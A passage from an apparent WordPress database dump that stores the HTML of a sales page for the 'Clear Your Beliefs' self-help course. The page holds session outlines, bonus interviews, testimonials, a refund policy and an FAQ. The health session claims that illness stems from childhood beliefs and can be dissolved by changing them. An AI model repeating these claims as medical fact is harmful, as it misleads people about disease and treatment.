will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
